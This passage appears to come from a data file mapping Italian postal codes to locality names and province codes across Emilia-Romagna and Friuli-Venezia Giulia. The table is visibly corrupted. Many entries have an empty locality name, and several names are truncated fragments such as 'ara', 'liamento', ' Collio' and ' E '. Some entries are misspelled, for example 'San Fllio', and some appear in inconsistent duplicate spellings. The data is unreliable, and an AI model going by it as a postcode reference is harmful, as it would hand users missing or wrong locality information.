"MO"], ["Valle", "MO"], ["Pazzano", "MO"], ["Montagnana", "MO"], ["", "MO"], ["Pompeano", "MO"], ["Ricco'", "MO"], ["Monfestino", "MO"], ["Serramazzoni", "MO"], ["Selva", "MO"], ], "41029": [ ["Vesale", "MO"], ["Sestola", "MO"], ["", "MO"], ["Casine", "MO"], ["Castellaro", "MO"], ["Roncoscaglia", "MO"], ["", "MO"], ], "41030": [ ["", "MO"], ["", "MO"], ["Sorbara", "MO"], ["", "MO"], ["", "MO"], ["", "MO"], ["Solara", "MO"], ["Gorghetto", "MO"], ["", "MO"], ["", "MO"], ["Bomporto", "MO"], ["San Prospero", "MO"], ["Bastiglia", "MO"], ["Staggia", "MO"], ], "41031": [["Camposanto", "MO"]], "41032": [["Cavezzo", "MO"], ["", "MO"], ["Motta", "MO"], ["", "MO"]], "41033": [ ["", "MO"], ["Santa Caterina", "MO"], ["", "MO"], ["Vallalta", "MO"], ["", "MO"], ["Fossa", "MO"], ], "41034": [["", "MO"], ["", "MO"]], "41035": [["", "MO"]], "41036": [["Villafranca", "MO"], ["Medolla", "MO"], ["", "MO"], ["Camurana", "MO"]], "41037": [ ["Gavello", "MO"], ["Cividale", "MO"], ["", "MO"], ["Quarantoli", "MO"], ["Mortizzuolo", "MO"], ["", "MO"], ["Tramuschio", "MO"], ["", "MO"], ["Mirandola", "MO"], ["", "MO"], ], "41038": [ ["Rivara", "MO"], ["", "MO"], ["San Biagio In Padule", "MO"], ["San Biagio", "MO"], ["Dogaro", "MO"], ["Pavignane", "MO"], ["Confine", "MO"], ], "41039": [["", "MO"]], "41040": [ ["Gombola", "MO"], ["", "MO"], ["", "MO"], ["Polinago", "MO"], ["Cassano", "MO"], ], "41042": [["Ubersetto", "MO"], ["", "MO"], ["Spezzano", "MO"]], "41043": [ ["Casinalbo", "MO"], ["", "MO"], ["Magreta", "MO"], ["Colombaro", "MO"], ["", "MO"], ["Formigine", "MO"], ], "41044": [ ["", "MO"], ["Romanoro", "MO"], ["Piandelagotti", "MO"], ["Riccovolto", "MO"], ["Rovolo", "MO"], ["Sassatella", "MO"], ["Frassinoro", "MO"], ["Fontanaluccia", "MO"], ["Cargedolo", "MO"], ], "41045": [ ["Lago", "MO"], ["Montefiorino", "MO"], ["Vitriola", "MO"], ["Macognano", "MO"], ["Farneta", "MO"], ["Gusciola", "MO"], ["Casola", "MO"], ["Rubbiano", "MO"], ], "41046": [ ["", "MO"], ["Susano", "MO"], ["Savoniero", "MO"], ["Palagano", "MO"], ["Boccassuolo", "MO"], ["Monchio", "MO"], ["Costrignano", "MO"], ], "41048": [ ["Morano", "MO"], ["", "MO"], ["Castelvecchio", "MO"], ["", "MO"], ["Pigneto", "MO"], ["", "MO"], ["", "MO"], ["Moncerrato", "MO"], ["Saltino", "MO"], ["Montebaranzone", "MO"], ], "41049": [["Sassuolo", "MO"], ["", "MO"], ["Montegibbio", "MO"]], "41051": [["Montale", "MO"], ["", "MO"], ["", "MO"]], "41052": [ ["Guiglia", "MO"], ["Samone", "MO"], ["Gainazzo", "MO"], ["", "MO"], ["Rocchetta", "MO"], ["Monteorsello", "MO"], ["", "MO"], ["", "MO"], ["", "MO"], ], "41053": [["", "MO"], ["Gorzano", "MO"], ["Maranello", "MO"], ["Pozza", "MO"]], "41054": [["", "MO"], ["Ospitaletto", "MO"], ["", "MO"], ["Festa'", "MO"]], "41055": [ ["Iola", "MO"], ["", "MO"], ["Montalto", "MO"], ["Bertocchi", "MO"], ["Salto", "MO"], ["", "MO"], ["Montese", "MO"], ["", "MO"], ["Montespecchio", "MO"], ["Castelluccio", "MO"], ["", "MO"], ["Maserno", "MO"], ["Semelano", "MO"], ], "41056": [ ["Formica", "MO"], ["Garofano", "MO"], ["Magazzino", "MO"], ["", "MO"], ["Mulino", "MO"], ], "41057": [["Spilamberto", "MO"], ["San Vito", "MO"]], "41058": [["Vignola", "MO"]], "41059": [ ["Monteombraro", "MO"], ["Montealbano", "MO"], ["Montetortore", "MO"], ["", "MO"], ["Montecorone", "MO"], ["Missano", "MO"], ["Zocca", "MO"], ["Rosola", "MO"], ["Ciano", "MO"], ], "41100": [ ["", "MO"], ["Vaciglio", "MO"], ["Marzaglia", "MO"], ["Modena", "MO"], ["Baggiovara", "MO"], ["", "MO"], ["Freto", "MO"], ["", "MO"], ["Lesignana", "MO"], ["", "MO"], ["Cognento", "MO"], ["Villanova", "MO"], ["Albareto", "MO"], ["", "MO"], ["Ganaceto", "MO"], ["Portile", "MO"], ["San Damaso", "MO"], ], "29010": [ ["Besenzone", "PC"], ["Agazzano", "PC"], ["Rottofreno", "PC"], ["Fogarole", "PC"], ["Stra'", "PC"], ["Vicobarone", "PC"], ["'", "PC"], ["", "PC"], ["Gazzola", "PC"], ["Sarmato", "PC"], ["", "PC"], ["Tassara", "PC"], ["Lusurasco", "PC"], ["", "PC"], ["Vigoleno", "PC"], ["Chiaravalle", "PC"], ["Valconasso", "PC"], ["Cadeo", "PC"], ["Calendasco", "PC"], ["San Pietro In Cerro", "PC"], ["San Nazzaro D'Ongina", "PC"], ["Caminata", "PC"], ["Castelnuovo Fogliani", "PC"], ["Olza", "PC"], ["Roveleto", "PC"], ["San Giuliano", "PC"], ["Mezzano Chitantolo", "PC"], ["", "PC"], ["San Giuliano Piacentino", "PC"], ["Casaliggio", "PC"], ["Piozzano", "PC"], ["Campremol E Sotto", "PC"], ["Bacedasco Sotto", "PC"], ["", "PC"], ["San Nicolo' A Trebbia", "PC"], ["Sant'Imento", "PC"], ["Villanova", "PC"], ["Nibbiano", "PC"], ["Vernasca", "PC"], ["Pontenure", "PC"], ["Pianello Val Tidone", "PC"], ["", "PC"], ["Campremol", "PC"], ["Trevozzo", "PC"], ["", "PC"], ["Pecorara", "PC"], ["Rezzanello", "PC"], ["Alseno", "PC"], ], "29011": [["Borgonovo Val Tidone", "PC"], ["Castelnovo Val Tidone", "PC"], ["Castelnuovo", "PC"]], "29012": [["Caorso", "PC"]], "29013": [["Rezzano", "PC"], ["Carpaneto Piacentino", "PC"]], "29014": [["Castell'Arquato", "PC"], ["", "PC"]], "29015": [["", "PC"], ["", "PC"], ["Creta", "PC"], ["Ganaghello", "PC"]], "29016": [["Cortemaggiore", "PC"]], "29017": [["", "PC"], ["Baselicaduce", "PC"], ["", "PC"]], "29018": [["", "PC"], ["Rustigazzo", "PC"], ["", "PC"]], "29019": [["", "PC"], ["", "PC"], ["Godi", "PC"]], "29020": [ ["Quadrelli", "PC"], ["Perino", "PC"], ["Coli", "PC"], ["Zerba", "PC"], ["Pej", "PC"], ["", "PC"], ["Morfasso", "PC"], ["", "PC"], ["Villo'", "PC"], ["Cerignale", "PC"], ["Carmiano", "PC"], ["Marsaglia", "PC"], ["", "PC"], ["Gossolengo", "PC"], ["Settima", "PC"], ["Vigolzone", "PC"], ["", "PC"], ["Quarto", "PC"], ["Travo", "PC"], ], "29021": [ ["", "PC"], ["", "PC"], ["Bramaiano", "PC"], ["Groppoducale", "PC"], ["Bettola", "PC"], ], "29022": [ ["", "PC"], ["", "PC"], ["Cassolo", "PC"], ["Vaccarezza", "PC"], ["Bobbio", "PC"], ["", "PC"], ["", "PC"], ["Ceci", "PC"], ], "29023": [["Mareto", "PC"], ["Groppallo", "PC"], ["", "PC"], ["Farini", "PC"]], "29024": [ ["", "PC"], ["Centenaro", "PC"], ["", "PC"], ["Brugneto", "PC"], ["", "PC"], ["Salsominore", "PC"], ["Ferriere", "PC"], [" E ", "PC"], ], "29025": [["Gropparello", "PC"], ["Sariano", "PC"], ["Groppovisdomo", "PC"]], "29026": [["Ottone", "PC"], ["Orezzoli", "PC"]], "29027": [["Podenzano", "PC"], ["", "PC"]], "29028": [["Torrano", "PC"], ["", "PC"], ["Biana", "PC"]], "29029": [ ["", "PC"], ["Rivergaro", "PC"], ["Niviano", "PC"], ["", "PC"], ["", "PC"], ], "29100": [ ["", "PC"], ["Mucinasso", "PC"], ["Pittolo", "PC"], ["Roncaglia", "PC"], ["", "PC"], ["", "PC"], ["Raffaelina", "PC"], ["Verza", "PC"], ["", "PC"], ["Sant'Antonio", "PC"], ["", "PC"], ["Piacenza", "PC"], ["Gerbido", "PC"], ["Raffaellina", "PC"], ["Mortizza", "PC"], ], "29121": [["Piacenza", "PC"]], "29122": [["Piacenza", "PC"]], "43010": [ ["Bianconese", "PR"], ["", "PR"], ["Rigoso", "PR"], ["Fontanelle", "PR"], ["", "PR"], ["Riana", "PR"], ["Roccabianca", "PR"], ["Castelguelfo", "PR"], ["Valditacca", "PR"], ["Ragazzola", "PR"], ["", "PR"], ["Fontevivo", "PR"], ], "43011": [["Busseto", "PR"], ["", "PR"]], "43012": [["Parola", "PR"], ["Fontanellato", "PR"]], "43013": [ ["Riano", "PR"], ["Pilastro", "PR"], ["Cozzano", "PR"], ["Pastorello", "PR"], ["Langhirano", "PR"], ["Torrechiara", "PR"], ], "43014": [["Ramiola", "PR"], ["Felegara", "PR"], ["Medesano", "PR"]], "43015": [["", "PR"], ["Costamezzana", "PR"], ["Noceto", "PR"]], "43016": [["", "PR"], ["Pieveottoville", "PR"], ["Zibello", "PR"]], "43017": [["San Secondo Parmense", "PR"]], "43018": [ ["Coltaro", "PR"], ["", "PR"], ["Gramignazzo", "PR"], ["Trecasali", "PR"], ["Sissa", "PR"], ["", "PR"], ["", "PR"], ["Viarolo", "PR"], ], "43019": [["Soragna", "PR"]], "43021": [ ["Bosco", "PR"], ["Beduzzo", "PR"], ["", "PR"], ["", "PR"], ["Corniglio", "PR"], ["", "PR"], ], "43022": [ ["Montechiarugolo", "PR"], ["Basilicanova", "PR"], ["", "PR"], ["", "PR"], ["Basilicagoiano", "PR"], ], "43024": [ ["Scurano", "PR"], ["Mediano", "PR"], ["", "PR"], ["Mozzano", "PR"], ["Vezzano", "PR"], ["Lupazzano", "PR"], ["Provazzano", "PR"], ["", "PR"], ["", "PR"], ], "43025": [ ["Isola", "PR"], ["Palanzano", "PR"], ["Vairo", "PR"], ["Ruzzano", "PR"], ["", "PR"], ["", "PR"], ["Selvanizza", "PR"], ["Ranzano", "PR"], ], "43028": [ ["", "PR"], ["Carpaneto", "PR"], ["Reno", "PR"], ["Capoponte", "PR"], ["Lagrimone", "PR"], ["Capriglio", "PR"], ["", "PR"], ], "43029": [["Traversetolo", "PR"], ["Vignale", "PR"], ["Mamiano", "PR"], ["", "PR"]], "43030": [["Marzolara", "PR"], ["Bore", "PR"], ["Calestano", "PR"], ["Ravarano", "PR"]], "43032": [ ["Bardi", "PR"], ["", "PR"], ["Pione", "PR"], ["", "PR"], ["Gravago", "PR"], ], "43035": [["", "PR"], ["", "PR"], ["Felino", "PR"]], "43036": [ ["Fidenza", "PR"], ["", "PR"], ["Cogolonchio", "PR"], ["", "PR"], ["", "PR"], ["", "PR"], ], "43037": [ ["", "PR"], ["", "PR"], ["Mulazzano", "PR"], ["", "PR"], ["", "PR"], ], "43038": [["San Vitale", "PR"], ["", "PR"], ["", "PR"], ["Talignano", "PR"]], "43039": [ ["Tabiano", "PR"], ["Congelasio", "PR"], ["", "PR"], ["Campore", "PR"], ["", "PR"], ["", "PR"], ["Bargone", "PR"], ["Cangelasio", "PR"], ["Scipione", "PR"], ], "43040": [ ["Corniana", "PR"], ["Terenzo", "PR"], ["Vianino", "PR"], ["Casola", "PR"], ["Specchio", "PR"], ["Solignano", "PR"], ["", "PR"], ["Viazzano", "PR"], ["Cassio", "PR"], ["", "PR"], ["", "PR"], ["", "PR"], ["Prelerna", "PR"], ], "43041": [ ["Pontestrambo", "PR"], ["Ponteceno", "PR"], ["Bedonia", "PR"], ["Masanti", "PR"], ["", "PR"], ["Drusco", "PR"], ["", "PR"], ], "43042": [ ["Berceto", "PR"], ["", "PR"], ["Ghiare", "PR"], ["Bergotto", "PR"], ["Castellonchio", "PR"], ["Fugazzolo", "PR"], ["Casaselvatica", "PR"], ], "43043": [ ["Porcigatone", "PR"], ["", "PR"], ["Tiedoli", "PR"], ["", "PR"], ["Pontolo", "PR"], ["", "PR"], ], "43044": [ ["Collecchio", "PR"], ["Gaiano", "PR"], ["Madregolo", "PR"], ["", "PR"], ["", "PR"], ], "43045": [ ["Ricco'", "PR"], ["", "PR"], ["Sivizzano", "PR"], ["Piantonia", "PR"], ["", "PR"], ], "43047": [["", "PR"], ["Grotta", "PR"], ["Mariano", "PR"], ["Iggio", "PR"]], "43048": [["", "PR"], ["", "PR"], ["", "PR"]], "43049": [["Pessola", "PR"], ["Carpadasco", "PR"], ["Varsi", "PR"]], "43050": [ ["", "PR"], ["", "PR"], ["Valmozzola", "PR"], ["Mormorola", "PR"], ["", "PR"], ], "43051": [["Albareto", "PR"], ["", "PR"], ["", "PR"], ["Bertorella", "PR"]], "43052": [["Colorno", "PR"]], "43053": [["Compiano", "PR"], ["Strela", "PR"], ["Cereseto", "PR"]], "43055": [ ["", "PR"], ["Casale", "PR"], ["", "PR"], ["", "PR"], ], "43056": [["Torrile", "PR"], ["", "PR"]], "43058": [["Sorbolo", "PR"], ["Chiozzola", "PR"], ["Mezzani", "PR"]], "43059": [["", "PR"], ["Tornolo", "PR"], ["", "PR"], ["Tarsogno", "PR"]], "43100": [ ["Vicomero", "PR"], ["Botteghino", "PR"], ["Alberi", "PR"], ["Carignano", "PR"], ["Panocchia", "PR"], ["Parma", "PR"], ["Baganzola", "PR"], ["", "PR"], ["Moletolo", "PR"], ["", "PR"], ["Vicofertile", "PR"], ["Paradigna", "PR"], ["Fontanini", "PR"], ["Gaione", "PR"], ["Fraore", "PR"], ["San Lazzaro Parmense", "PR"], ["San Prospero Parmense", "PR"], ["Fontana", "PR"], ["Porporano", "PR"], ["Corcagnano", "PR"], ["Marano", "PR"], ["Vigatto", "PR"], ["San Pancrazio Parmense", "PR"], ], "43122": [["Parma", "PR"]], "43126": [["Parma", "PR"]], "48010": [["", "RA"]], "48011": [["Alfonsine", "RA"]], "48012": [ ["Bagnacavallo", "RA"], ["", "RA"], ["Glorie", "RA"], ["Abbatesse", "RA"], ["Villanova", "RA"], ["Boncellino", "RA"], ["Masiera", "RA"], ["Traversara", "RA"], ], "48013": [ ["", "RA"], ["Fognano", "RA"], ["ara", "RA"], ["Zattaglia", "RA"], ["Monteromano", "RA"], ["Brisighella", "RA"], ["Marzeno", "RA"], ], "48014": [["", "RA"]], "48015": [ ["Pisignano", "RA"], ["", "RA"], ["Pinarella", "RA"], ["", "RA"], ["Castiglione", "RA"], ["Savio", "RA"], ["Cervia", "RA"], ["Cannuzzo", "RA"], ["", "RA"], ], "48017": [["Conselice", "RA"], ["Lavezzola", "RA"], ["San Patrizio", "RA"]], "48018": [ ["", "RA"], ["Errano", "RA"], ["", "RA"], ["", "RA"], ["Cosina", "RA"], ["Santa Lucia Delle Spianate", "RA"], ["Celle", "RA"], ["Sarna", "RA"], ["", "RA"], ["Prada", "RA"], ["Faenza", "RA"], ["Fossolo", "RA"], ["Mezzeno", "RA"], ["Reda", "RA"], ["Granarolo", "RA"], ], "48020": [["Savarna", "RA"], ["Sant'Alberto", "RA"], [" Santerno", "RA"]], "48022": [ ["Santa Maria In Fabriago", "RA"], ["San Bernardino", "RA"], ["Passogatto", "RA"], ["Giovecca", "RA"], ["Lugo", "RA"], ["", "RA"], ["Ascensione", "RA"], ["Voltana", "RA"], ["San Potito", "RA"], ["Belricetto", "RA"], ["", "RA"], ], "48024": [["", "RA"], ["", "RA"]], "48025": [["", "RA"], ["", "RA"]], "48026": [["", "RA"], ["Russi", "RA"], ["Godo", "RA"]], "48027": [["Gaiano", "RA"], ["Solarolo", "RA"]], "48031": [["", "RA"]], "48032": [["", "RA"]], "48033": [["Barbiano", "RA"], ["San Severo", "RA"], ["Cotignola", "RA"]], "48034": [["Fusignano", "RA"]], "48100": [ ["Santerno", "RA"], ["", "RA"], ["", "RA"], ["Piangipane", "RA"], ["", "RA"], ["", "RA"], ["", "RA"], ["", "RA"], ["Camerlona", "RA"], ["Mezzano", "RA"], ["", "RA"], ["San Zaccaria", "RA"], ["Roncalceci", "RA"], ["Ducenta", "RA"], ["Classe", "RA"], ["Carraie", "RA"], ["Durazzano", "RA"], ["Filetto", "RA"], ["", "RA"], ["Gambellara", "RA"], ["", "RA"], ["Ravenna", "RA"], ["", "RA"], ["San Pietro In Trento", "RA"], ["Ghibullo", "RA"], ["", "RA"], ["San Pietro In Vincoli", "RA"], ["Campiano", "RA"], ["", "RA"], ["", "RA"], ["", "RA"], ["Coccolia", "RA"], ["", "RA"], ["", "RA"], ["Ammonite", "RA"], ["San Pietro In Campiano", "RA"], ], "42010": [ ["Quara", "RE"], ["", "RE"], ["Cerredolo", "RE"], ["Cavola", "RE"], ["Toano", "RE"], ["San Cassiano", "RE"], ], "42011": [["Bagnolo In Piano", "RE"]], "42012": [["", "RE"]], "42013": [["Villalunga", "RE"], ["Veggia", "RE"], ["Casalgrande", "RE"], ["Salvaterra", "RE"]], "42014": [["Cadiroggio", "RE"], ["Castellarano", "RE"], ["Roteglia", "RE"]], "42015": [["Prato", "RE"], ["", "RE"], ["Fosdondo", "RE"], ["Correggio", "RE"], ["Budrio", "RE"]], "42016": [["", "RE"], ["Pieve", "RE"], ["Guastalla", "RE"]], "42017": [ ["Novellara", "RE"], ["", "RE"], ["", "RE"], ["Vezzola", "RE"], ["", "RE"], ], "42018": [["San Martino In Rio", "RE"]], "42019": [ ["Arceto", "RE"], ["Pratissolo", "RE"], ["", "RE"], ["Ventoso", "RE"], ["Scandiano", "RE"], ["Chiozza", "RE"], ["Fellegara", "RE"], ["Iano", "RE"], ["Bosco", "RE"], ["Rondinara", "RE"], ], "42020": [ ["Vetto", "RE"], ["Cola", "RE"], ["Puianello", "RE"], ["Rosano", "RE"], ["", "RE"], ["Borzano", "RE"], ["Albinea", "RE"], ["", "RE"], ["Montecavolo", "RE"], ["Roncolo", "RE"], ], "42021": [["Bibbiano", "RE"], ["Barco", "RE"]], "42022": [["Boretto", "RE"]], "42023": [["", "RE"], ["Argine", "RE"], ["", "RE"]], "42024": [["Meletole", "RE"], ["", "RE"]], "42025": [["Cavriago", "RE"]], "42026": [["Canossa", "RE"], ["", "RE"], ["", "RE"]], "42027": [["", "RE"]], "42028": [["Poviglio", "RE"]], "42030": [ ["Gazzano", "RE"], ["Succiso", "RE"], ["Viano", "RE"], ["Montalto", "RE"], ["", "RE"], ["", "RE"], ["", "RE"], ["Pecorile", "RE"], ["", "RE"], ["Regnano", "RE"], ["Civago", "RE"], ["Minozzo", "RE"], ["Sologno", "RE"], ["", "RE"], ], "42031": [["Baiso", "RE"], ["", "RE"], ["Levizzano", "RE"]], "42032": [ ["", "RE"], ["Ramiseto", "RE"], ["Castagneto", "RE"], ["", "RE"], ["Cervarezza", "RE"], ["Cinquecerri", "RE"], ["Ligonchio", "RE"], ["Busana", "RE"], ["Collagna", "RE"], ["", "RE"], ], "42033": [["Carpineti", "RE"], ["Pantano", "RE"], ["Savognatica", "RE"], ["Valestra", "RE"], ["Marola", "RE"]], "42034": [["Casina", "RE"], ["", "RE"], ["Trinita'", "RE"]], "42035": [ ["Casale", "RE"], ["Felina", "RE"], ["Villaberza", "RE"], ["", "RE"], ["Vologno", "RE"], ["Monteduro", "RE"], ["", "RE"], ["Croce", "RE"], ["", "RE"], ["Gatta", "RE"], ["", "RE"], ], "42040": [["Campegine", "RE"], ["Caprara", "RE"]], "42041": [["Brescello", "RE"], ["Lentigione", "RE"]], "42042": [["Fabbrico", "RE"]], "42043": [["Taneto", "RE"], ["Gattatico", "RE"], ["Praticello", "RE"]], "42044": [ ["Gualtieri", "RE"], ["", "RE"], ["", "RE"], ["", "RE"], ], "42045": [["Villarotta", "RE"], ["Casoni", "RE"], ["Luzzara", "RE"], ["Codisotto", "RE"]], "42046": [["Reggiolo", "RE"], ["Brugneto", "RE"]], "42047": [["Rolo", "RE"]], "42048": [["Rubiera", "RE"]], "42049": [["", "RE"], ["Calerno", "RE"]], "42100": [ ["Marmirolo", "RE"], ["", "RE"], ["Bagno", "RE"], ["", "RE"], ["Mancasale", "RE"], ["Gavassa", "RE"], ["Cella", "RE"], ["Cade'", "RE"], ["Ospizio", "RE"], ["Fogliano", "RE"], ["Quaresimo", "RE"], ["Codemondo", "RE"], ["Cavazzoli", "RE"], ["Coviolo", "RE"], ["Roncocesi", "RE"], ["Massenzatico", "RE"], ["Canali", "RE"], ["Castellazzo", "RE"], ["Rivalta", "RE"], ["Gaida", "RE"], ["", "RE"], ["Masone", "RE"], ["Sesso", "RE"], ["", "RE"], ["Corticella", "RE"], ["Gavasseto", "RE"], ], "47814": [["", "RN"], ["", "RN"], ["Bellaria", "RN"]], "47822": [ ["", "RN"], ["", "RN"], ["", "RN"], ["Sant'Ermete", "RN"], ["", "RN"], ["", "RN"], ["", "RN"], ["", "RN"], ], "47824": [ ["", "RN"], ["Torriana", "RN"], ["Trebbio", "RN"], ["", "RN"], ["", "RN"], ], "47826": [["Verucchio", "RN"], ["", "RN"]], "47832": [["", "RN"], ["", "RN"]], "47833": [["", "RN"]], "47834": [["", "RN"], ["Serbadone", "RN"]], "47835": [["Saludecio", "RN"], ["Santa Maria Del Monte", "RN"]], "47836": [["Mondaino", "RN"]], "47837": [["Montegridolfo", "RN"]], "47838": [["Riccione", "RN"]], "47841": [["Cattolica", "RN"]], "47842": [["Pianventena", "RN"], ["Montalbano", "RN"], ["", "RN"]], "47843": [ ["", "RN"], ["", "RN"], ["Belvedere", "RN"], ["", "RN"], ["", "RN"], ["Scacciano", "RN"], ["Cella", "RN"], ], "47853": [ ["Ospedaletto", "RN"], ["", "RN"], ["", "RN"], ["Cerasolo", "RN"], ["Coriano", "RN"], ], "47854": [ ["Trarivi", "RN"], ["", "RN"], ["", "RN"], ["", "RN"], ["Croce", "RN"], ["", "RN"], ["Montescudo", "RN"], ["Santa Maria Del Piano", "RN"], ], "47855": [["Onferno", "RN"], ["Gemmano", "RN"]], "47861": [["Casteldelci", "RN"]], "47862": [["Maiolo", "RN"]], "47863": [ ["", "RN"], ["", "RN"], ["Novafeltria", "RN"], ["Perticara", "RN"], ], "47864": [ ["", "RN"], ["Soanne", "RN"], ["", "RN"], ["Pennabilli", "RN"], ["Maciano", "RN"], ], "47865": [["", "RN"], ["Pietracuta", "RN"], ["Montemaggio", "RN"]], "47866": [["", "RN"], ["", "RN"]], "47867": [["Talamello", "RN"]], "47900": [ ["", "RN"], ["Rimini", "RN"], ["Rivazzurra", "RN"], ["", "RN"], ["Bellariva", "RN"], ["Vergiano", "RN"], ["", "RN"], ["", "RN"], ["", "RN"], ["Corpolo'", "RN"], ["Viserbella", "RN"], ["", "RN"], ["Gaiofana", "RN"], ["Viserba", "RN"], ["", "RN"], ["Rivabella", "RN"], ], "47921": [["Rimini", "RN"]], "47922": [["Rimini", "RN"]], "47923": [["Rimini", "RN"]], "47924": [["Rimini", "RN"]], "34070": [ ["Jamiano", "GO"], ["Scrio'", "GO"], ["Marcottini", "GO"], ["Villesse", "GO"], ["", "GO"], ["", "GO"], ["", "GO"], ["San Fllio", "GO"], [" Collio", "GO"], ["Corona", "GO"], ["", "GO"], ["Polazzo", "GO"], ["", "GO"], ["Redipuglia", "GO"], ["Lonzano", "GO"], ["Venco'", "GO"], ["Cassegliano", "GO"], ["", "GO"], ["", "GO"], ["Mernicco", "GO"], ["Rupa", "GO"], ["", "GO"], ["", "GO"], ["Moraro", "GO"], ["Mossa", "GO"], ["Giasbana", "GO"], ["Turriaco", "GO"], ["Gabria", "GO"], ], "34071": [["Cormons", "GO"], ["Brazzano", "GO"], ["Borgnano", "GO"]], "34072": [["", "GO"], ["", "GO"]], "34073": [ ["", "GO"], ["", "GO"], ["Fossalon", "GO"], ["Grado", "GO"], ["", "GO"], ], "34074": [["Monfalcone", "GO"], ["", "GO"]], "34075": [["", "GO"], ["Pieris", "GO"], ["", "GO"], ["Begliano", "GO"]], "34076": [["Medea", "GO"], ["Versa", "GO"], ["", "GO"], ["Fratta", "GO"]], "34077": [["", "GO"], ["Vermegliano", "GO"]], "34078": [["", "GO"], ["", "GO"], ["Sagrado", "GO"]], "34079": [["Bistrigna", "GO"], ["Staranzano", "GO"]], "34170": [ ["Oslavia", "GO"], ["", "GO"], ["Gorizia", "GO"], ["Lucinico", "GO"], ["Piuma", "GO"], ], "33070": [ ["Polcenigo", "PN"], ["Sarone", "PN"], ["Caneva", "PN"], ["Dardago", "PN"], ["", "PN"], ["Brugnera", "PN"], ["", "PN"], ["Stevena'", "PN"], ["Maron", "PN"], ["Tamai", "PN"], ["Budoia", "PN"], ], "33072": [["", "PN"], ["", "PN"]], "33074": [["Vigonovo", "PN"], ["Fontanafredda", "PN"], ["Nave", "PN"], ["Ceolini", "PN"]], "33075": [["", "PN"], ["Mussons", "PN"], ["Cordovado", "PN"]], "33076": [["Pravisdomini", "PN"], ["Barco", "PN"]], "33077": [["Cavolano", "PN"], ["Schiavoi", "PN"], ["Sacile", "PN"], ["", "PN"]], "33078": [["", "PN"], ["Gleris", "PN"], ["Savorgnano", "PN"]], "33079": [["Ramuscello", "PN"], ["Bagnarola", "PN"], ["", "PN"], ["Casette", "PN"]], "33080": [ ["", "PN"], ["Palse", "PN"], ["Claut", "PN"], ["Bannia", "PN"], ["Ghirano", "PN"], ["Barcis", "PN"], ["Porcia", "PN"], ["Vajont", "PN"], ["Roraipiccolo", "PN"], ["Zoppola", "PN"], ["Cimolais", "PN"], ["Puia", "PN"], ["Poffabro", "PN"], ["", "PN"], ["Cimpello", "PN"], ["Sedrano", "PN"], ["Castions", "PN"], ["", "PN"], ["", "PN"], ["Villanova", "PN"], ["", "PN"], ["Frisanco", "PN"], ["", "PN"], ["", "PN"], ["Andreis", "PN"], ], "33081": [ ["Aviano", "PN"], ["Castello", "PN"], ["Cortina", "PN"], ["Giais", "PN"], ["Selva", "PN"], ["Glera", "PN"], ["Marsure", "PN"], ["", "PN"], ], "33082": [["Corva", "PN"], ["Fagnigola", "PN"], ["Tiezzo", "PN"], ["", "PN"]], "33083": [["Chions", "PN"], ["Villotta", "PN"], ["Taiedo", "PN"]], "33084": [["Musil", "PN"], ["Cordenons", "PN"], ["", "PN"]], "33085": [["Campagna", "PN"], ["Maniago", "PN"]], "33086": [ ["", "PN"], ["", "PN"], ["", "PN"], ["Malnisio", "PN"], ], "33087": [ ["Rivarotta", "PN"], ["Visinale", "PN"], ["Cecchini", "PN"], ["Pasiano", "PN"], ["", "PN"], ["Pozzo", "PN"], ], "33090": [ ["", "PN"], ["Casiacco", "PN"], ["Chievolis", "PN"], ["Sequals", "PN"], ["", "PN"], ["", "PN"], ["Solimbergo", "PN"], ["Travesio", "PN"], ["Colle", "PN"], ["Toppo", "PN"], ["Pielungo", "PN"], ["Arba", "PN"], ["Lestans", "PN"], ["Anduins", "PN"], ["Campone", "PN"], ["Clauzetto", "PN"], ["Usago", "PN"], ["", "PN"], ], "33092": [["Fanna", "PN"], ["Meduno", "PN"], ["", "PN"]], "33094": [["Valeriano", "PN"], ["", "PN"]], "33095": [["Domanins", "PN"], ["Rauscedo", "PN"], ["Provesano", "PN"], ["", "PN"]], "33097": [["Tauriano", "PN"], ["Barbeano", "PN"], ["Spilimbergo", "PN"], ["Istrago", "PN"], ["Vacile", "PN"]], "33098": [ ["", "PN"], ["", "PN"], ["Arzene", "PN"], ["liamento", "PN"], ["Valvasone", "PN"], ], "33099": [["Vivaro", "PN"]], "33170": [ ["Vallenoncello", "PN"], ["La Comina", "PN"], ["Comina (La)", "PN"], ["", "PN"], ["Pordenone", "PN"], ], "34010": [["Sgonico", "TS"]], "34011": [ ["Sistiana", "TS"], ["Aurisina", "TS"], ["", "TS"], ["Duino", "TS"], ["San Pelagio", "TS"], ["", "TS"], ["Visogliano", "TS"], ], "34012": [["Basovizza", "TS"]], "34014": [["Grignano", "TS"], ["Santa Croce", "TS"], ["Santa Croce Di Trieste", "TS"]], "34015": [["Muggia", "TS"], ["", "TS"], ["Stramare", "TS"], ["Aquilinia", "TS"]], "34016": [["Monrupino", "TS"]], "34017": [["Prosecco", "TS"]], "34018": [ ["", "TS"], ["Domio", "TS"], ["", "TS"], ["", "TS"], ["", "TS"], ], "34100": [["Trieste", "TS"]], "34121": [["Trieste", "TS"]], "34122": [["Trieste", "TS"]], "34123": [["Trieste", "TS"]], "34124": [["Trieste", "TS"]], "34125": [["Trieste", "TS"]], "34126": [["Trieste", "TS"]], "34127": [["Trieste", "TS"]], "34128": [["Trieste", "TS"]], "34129": [["Trieste", "TS"]], "34131": [["Trieste", "TS"]], "34132": [["Trieste", "TS"]], "34133": [["Trieste", "TS"]], "34134": [["Trieste", "TS"]], "34135": [["Trieste", "TS"]], "34136": [["Trieste", "TS"], ["Cedas", "TS"]], "34137": [["Trieste", "TS"]], "34138": [["Trieste", "TS"]], "34139": [["Trieste", "TS"]], "34141": [["Trieste", "TS"]], "34142": [["Trieste", "TS"]], "34143": [["Trieste", "TS"]], "34144": [["Trieste", "TS"]], "34145": [["Trieste", "TS"]], "34146": [["Trieste", "TS"]], "34147": [["Trieste", "TS"], ["Aquilinia", "TS"]], "34148": [["Trieste", "TS"]], "34149": [["Trieste", "TS"], ["Cattinara", "TS"]], "34151": [["Trieste", "TS"]], "33010": [ ["Carvacco", "UD"], ["", "UD"], ["Montenars", "UD"], ["Colugna", "UD"], ["", "UD"], ["", "UD"], ["Valbruna", "UD"], ["", "UD"], ["Mels", "UD"], ["Tavagnacco", "UD"], ["Peonis", "UD"], ["Vendoglio", "UD"], ["", "UD"], ["", "UD"], ["Cassacco", "UD"], ["Lauzzana", "UD"], ["Resia", "UD"], ["Venzone", "UD"], ["Trasaghis", "UD"], ["Malborghetto", "UD"], ["Chiusaforte", "UD"], ["Ugovizza", "UD"], ["Cavalicco", "UD"], 